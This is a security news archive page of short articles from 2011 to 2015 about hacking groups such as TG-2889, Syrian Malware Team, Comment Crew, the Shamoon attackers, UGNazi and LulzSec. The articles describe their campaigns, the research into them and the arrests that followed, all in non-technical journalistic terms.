ISSSource White Papers

Posts Tagged ‘hacking group’

Friday, October 9, 2015 @ 04:10 PM gHale

A hacking group that hit the scene last December is now trawling about seeking to infiltrate different sectors, researchers said.

One research group thinks Iran-based attackers are building a network of fake LinkedIn user profiles with the aim of entering business circles of telecommunications and defense contractors.

Attack Group Uses Satellites for Anonymity
Insider Attacks Growing; Firms Not Prepared
German Steel Mill Attack: Inside Job
Multi-Tasking Leads to Incidents: Report

The Iranian group which Dell’s SecureWorks Counter Threat Unit Threat Intelligence team named Threat Group-2889 (TG-2889), seems to be the same group Cylance and the FBI warned about in December, when they went about infiltrating critical infrastructure points around the world, researchers said in a blog post.

Dell said the group is building a network of fake user profiles on LinkedIn, creating fake identities for high-tech professionals and trying to get in contact with various companies in different countries.

The group appears interested in the aerospace, defense, military, chemical, energy, government, and education industries. Most targets are from the telecommunications field, from companies located in the Middle East and North Africa.

In fact, countries in the Middle East make up the majority of targeted states. The top 5 is Saudi Arabia (39 businesses), Qatar (28), United Arab Emirates (27), Pakistan (17), and the United States (12).

Dell identified 25 of the fake LinkedIn profiles until now, and said they all ended up been created to support 8 accounts, called “leader personas.”

The other accounts only exist to support the leaders giving them credibility and creating a network of followers around them.

The follower accounts appear bare, the leader accounts have quite a bit of details, the TG-2889 members are going the distance to join various LinkedIn groups, and even updating their listings regularly, changing names and pictures before someone catches on.

Wednesday, September 3, 2014 @ 02:09 PM gHale

A hacking group is using an enhanced version of BlackWorm, a Remote Access Trojan (RAT), to weasel its way into organizations.

The Syrian Malware Team (a pro-Syrian government group of hackers) that has operated as far back as 2011, now primarily uses the “Dark Edition” version of BlackWorm in its campaigns, said researchers at security firm, FireEye.

Faux Security Program is a RAT
Android RAT can Take Control
APT: In Action for Six Years
IoT Devices Vulnerable to Attacks: Report

FireEye also detailed an original, or private, version of BlackWorm (v0.3.0), which was “fairly simple [allowing] for very quick payload,” said researchers in a blog post.

The earlier version of the RAT supported a number of commands, including system restart and shutdown, displaying “startling” flash videos on targeted machines, downloading and running files, killing critical Windows processes, and blocking keyboard and mouse input, FireEye said.

The “Dark Edition” version, however, ends up packaged with additional features, allowing attackers to bypass user account control (UAC), disable firewalls and spread over network shares.

“Unlike its predecessor, [BlackWorm Dark Edition] allows for granular control of the features available within the RAT,” the blog post said. “These additional controls allow the RAT user to enable and disable features as needed. Binary output can also be generated in multiple formats, such as .exe, .src and .dll.”

One of the blog writers said having a RAT in the target environment pretty much gives the attackers carte blanche.

In its post, FireEye referenced IntelCrawler research linking Syrian Malware Team with hacktivist group Syrian Electronic Army (SEA). In the March report, IntelCrawler said an SEA member, going by the online alias “Hawks,” appeared to withdraw from SEA in 2012 with interest in starting the Syrian Malware Team.

Thursday, June 27, 2013 @ 07:06 PM gHale

The suspected China-based hackers known as the “Comment Crew” labeled in the Mandiant report appear to be back in the saddle.

In February, the group’s activity was a focal point in a report from computer security vendor Mandiant.

Attack Plan Targets Oil Companies
Backdoor Malware Targets Asian Users
Malware Disguises as Antivirus
Self-Propagating Trojan Lives On

Mandiant’s report said a specific Chinese military unit called “61398” waged a seven-year hacking spree that compromised 141 organizations. The report added to other long-running research from security companies and organizations into suspected state-sponsored hacking.

The Comment Crew laid low for a while following the report but is back hacking again, said Alex Lanstein, senior researcher for FireEye.

“They took a little breather, and they started back up,” Lanstein said.

Following the attention in February, the group stopped using much of its command-and-control infrastructure. Instead, they started from scratch, directing malware at new targets.

“We didn’t see them take control of any of the systems they had previously compromised,” Lanstein said. “They started fresh with a whole new round of attacks.”

The group, while skilled, has made mistakes, many of which Mandiant picked up. Continuing analysis of the Comment Crew’s methods also revealed another mistake the group made, which conceivably makes it easier to link together attacks to a single source.

Lanstein said FireEye found the Comment Crew made an error when compiling their malicious software programs. When an application, including malware, ends up written in a programming language, the developer must compiled it, or translate it into machine-readable code.

In some instances, the Comment Crew forgot to remove the name of their particular coding project, called “Moonclient,” evident when a program decompiled, or reverted back to its original programming language.

Lanstein said the error showed “you are dealing with humans on the other side of the keyboard,” who are prone to make mistakes. “This is a mistake made over and over again,” he said.

FireEye decided to release information on the error since so much had already released on the Comment Crew, and it would make little difference now for computer security researchers tracking them since their tactics have changed.

“It’s more difficult to track them now,” Lanstein said.

Monday, September 10, 2012 @ 05:09 PM gHale

One or more insiders with high-level access may have assisted the hackers who damaged some 30,000 computers at Saudi Arabia’s national oil company, Saudi Aramco, last month, according to a published report.

The attack using a computer virus known as Shamoon against the world’s biggest oil company, Saudi Aramco, is one of the most destructive cyber strikes conducted against a single business.

Shamoon Malware Variant Running
New Virus Hits Oil Giant, LNG Producer
Qatar’s RasGas Suffers Virus Hit
Saudi Aramco Back Up after Attack
Saudi Aramco Hacked

Shamoon spread through the company’s network and wiped computers’ hard drives clean. Saudi Aramco said office computers suffered damage and the attack did not affect systems software that might hurt technical operations.

The hackers’ apparent access to a mole, willing to take personal risk to help, is an extraordinary development in a country that banned open dissent.

“It was someone who had inside knowledge and inside privileges within the company,” said a source familiar with the ongoing forensic examination in the published report.

Hackers from a group called “The Cutting Sword of Justice” claimed responsibility for the attack. They say the computer virus gave them access to documents from Aramco’s computers, and have threatened to release secrets. No one has published any documents so far.

In addition to hitting Saudi Aramco, Shamoon also struck Qatar’s RasGas, the second largest LNG producer in the world, said sources at the CIA in an ISSSource report.

“The virus hit Aramco and Qatari RasGas. In both cases, it knocked out computer workstations and corporate web sites,” the sources said.

Saudi Aramco declined to comment. “Saudi Aramco doesn’t comment on rumors and conjectures amidst an ongoing probe,” it said.

The hacking group that claimed responsibility for the attack described its motives as political.

In a posting on an online bulletin board the day they wiped the files, the group said Saudi Aramco was the main source of income for the Saudi government, which it blamed for “crimes and atrocities” in several countries, including Syria and Bahrain.

Saudi Aramco, which supplies about a tenth of the world’s oil, has hired at least six firms with expertise in hacking attacks, bringing in dozens of outside experts to investigate the attack and repair computers, the sources said in the published report.

According to analysis of Shamoon by computer security firm Symantec, the way the virus gets into networks may vary, but once inside it tries to infect every computer in the local area network before erasing files to render PCs useless.

“We don’t normally see threats that are so destructive,” Liam O Murchu, who helped lead Symantec’s research into the virus, said. “It’s probably been 10 years since we saw something so destructive.”

The state-run oil company, whose 260 billion barrels of crude oil alone would value it at over 8 trillion dollars, or 14 times the market value of Apple Inc., appeared well protected against break-in attempts over the Internet, according to people familiar with its network operations.

Yet those sources say such protections could not prevent an attack by an insider with high-level access.

The design of Shamoon is to attack ordinary business computers. It does not belong to the category of sophisticated cyber warfare tools, like the Stuxnet virus that attacked Iran’s nuclear program in 2010 – which target industrial control systems and can paralyze critical infrastructure.

Friday, June 8, 2012 @ 11:06 AM gHale

Hacking group UGNazi took down a string of sites including HostGator in live tests of a new Denial of Service (DoS) attack tool.

The tool, dubbed #TheHolocaust, targeted undisclosed vulnerabilities and had crippled HostGator in seconds from a machine with 2Gb of RAM, via a 10Mbps/2Mbps link, the group said in a published report.

Google Rolls Out Attack Warning
Google: Web Sites Hacked
Focus to Fix Sign-On Flaws
Hackers Expose Site’s Security Hole

HostGator and payments company remained offline until they resolved the issue.

The hackers wrote the DoS tool in Python and C++ and targeted vulnerabilities that would be easy to patch, group member named the “Godfather” said.

“We do not want to show the DOS Tool #TheHolocaust to the public yet as it is in development,” they said in the published report. “It affects the connection of the [targeted] server, as well as the [targeted] webserver.”

Not so long ago, UGNazi hacked cloud provider WHMCS through a social engineering attack against HostGator.

The perpetrator, named Cosmo, ended up arrested by the FBI. UGNazi in a later hack changed the DNS records of image board 4Chan pointing visitors to the hacking group’s Twitter account.

The latter hack was possible after they gained access to the personal Gmail account of CloudFlare’s chief executive Matthew Prince. The DoS protection company said the hackers navigated past Google’s two factor authentication exploiting a now fixed “subtle recovery flaw” and bypassed his AT&T voicemail PIN.

UGNazi claimed that hack was worse than what the CloudFlare led on they “got into their main server” and accessed customer account information including name, IP address and payment data.

Friday, March 16, 2012 @ 11:03 AM gHale

The word Anonymous brings immediate attention to anyone in the cyber security world. It brings fear, suspicion and intrigue all at the same time. So, it only makes sense an organization would try to capitalize on the name and begin a marketing effort.

There is now a new operating system called “Anonymous-OS” that comes pre-loaded with tools for hacking and protecting anonymity online. It remains is unclear whether the new operating system has an endorsement from the hacking group.

Case History: Hunting a Hacker
Watch Out for Malicious Proxies
How to Stop Stuxnet’s Children
Malware Developers say Tweet This

Anonymous-OS Version 0.1 released Tuesday and Sourceforge is offering it as a bitTorrent download, according to a post on a page for Anonymous-OS.

The operating system is an Ubuntu-based Linux distribution created under Ubuntu version 11.10. It uses the Mate Desktop Environment. Authors created the operating system for “educational purposes” to “(check) the security of Web pages,” according to the Anonymous-OS Tumblr page.

The new distribution comes loaded with tools useful to hackers, security researchers and those interested in preserving their anonymity online. Among the applications bundled with Anonymous-OS are the anonymizing Tor client, Wireshark, a network protocol analyzer, password cracker John the Ripper and Pyloris, a tool for launching denial of service attacks.

Its creators recommend booting the operating system from an external device such as a CD or USB drive, according to the Anonymous-OS Tumblr page.

Though the new Linux distribution clearly makes use of Anonymous’ name, it remains unclear whether any link exists between the group and those behind the new operating system.

Tuesday, January 24, 2012 @ 03:01 PM gHale

Once again, it bears repeating, if a hacker targets a specific organization, he will get in. That is what happened with a new hacking group called TeamHav0k, which launched an operation called “#OP XSS” where they try to find cross-site scripting (XSS) vulnerabilities in major websites.

They found them.

Social Media a Fine Tool; Security Disaster
Motivated Hacker Always Gets In
Steel Giant Hacked; Info Leaked
Symantec: Hackers got Some Code

A Pastebin document showed sites such Verizon, Huffington Post, European Organization for Nuclear Research (CERN), Electronic Arts (EA), IGN and The New York Times contain design flaws.

Some education institutions also contained XSS security holes, including University of Illinois, Harvard, Yale and Rockefeller University.

Telecom company Verizon, media hosting company ImageShack, value calculator and traffic estimator tool StatShow, Major League Gaming, and Dr Pepper complete the list.

Even though XSS vulnerabilities are among the most common ones found in commercial websites, this doesn’t mean they’re not dangerous. Cyber criminals can rely on these weaknesses to execute their own malicious codes and cause damage to the virtual assets of Internet users.

Fortunately, some web browsers protect their customers against these attacks. For instance, Internet Explorer 8 and Internet Explorer 9 display a warning message to reveal a modified page to prevent cross-site scripting.

Google Chrome also mitigates the attack, but Opera and Mozilla Firefox fail to do so, leaving their users exposed.

As a word of caution, websites need to continuously work to secure their domains against these common flaws. Because of the large numbers of visitors they have each day, hackers could end up using them for malicious purposes.

Monday, August 1, 2011 @ 03:08 PM gHale

A British teenager accused of acting as spokesman for computer hacking groups LulzSec and Anonymous is now out on bail – and not allowed to use the Internet.

Jake Davis, 18, faces charges after his arrest last week at his home on Scotland’s Shetland Islands.

Busted: FBI Takes On Hackers
Zero Day: UK Cops Bust Hacker
Charges Fly after Extortion Hack

Police said he mounted a cyber attack on Britain’s Serious Organized Crime Agency.

Davis used the online nickname Topiary and acted as a spokesman for the two hacktivist groups, linked to attacks on Britain’s National Health Service, Sony Corp., The Sun newspaper and other targets, police said.

Davis appeared Monday at City of Westminster Magistrates’ Court in London. Judge Howard Riddle ordered him released on bail — on condition he not use the Internet — until a court appearance Aug. 30.

Hacking arrests continue to rise as 16 people now faces charges after their arrests in the U.S. in connection with cyber attacks by the Anonymous group, the U.S. Department of Justice said.

An indictment filed last week in San Jose, Calif., names 14 people accused of conspiring to intentionally damage protected computers at PayPal last December in retribution for PayPal suspending WikiLeaks’ account to prevent supporters from donating to the whistleblower site. The arrests occurred in Alabama, Arizona, California, Colorado, the District of Columbia, Florida, Massachusetts, Nevada, New Mexico, and Ohio, the Justice Department said. The defendants will make initial appearances in federal courts in their areas.

In two separate indictments, a Sarasota, Fla., police busted a man on charges of intentionally damaging a protected computer for accessing the Web site of InfraGard Tampa Bay, an FBI partner, in June. The complaint said he released instructions on how to exploit the Web site.

Another man faces charges in Las Cruces, N.M., for stealing confidential business information from AT&T servers and posting it publicly in April, police said. The defendant, who works as a customer support contractor for AT&T at outsource provider Convergys, faces charges of accessing a protected computer without authorization for downloading thousands of documents, applications, and other files and then posting them on the Internet, the indictment said.

Archived Entries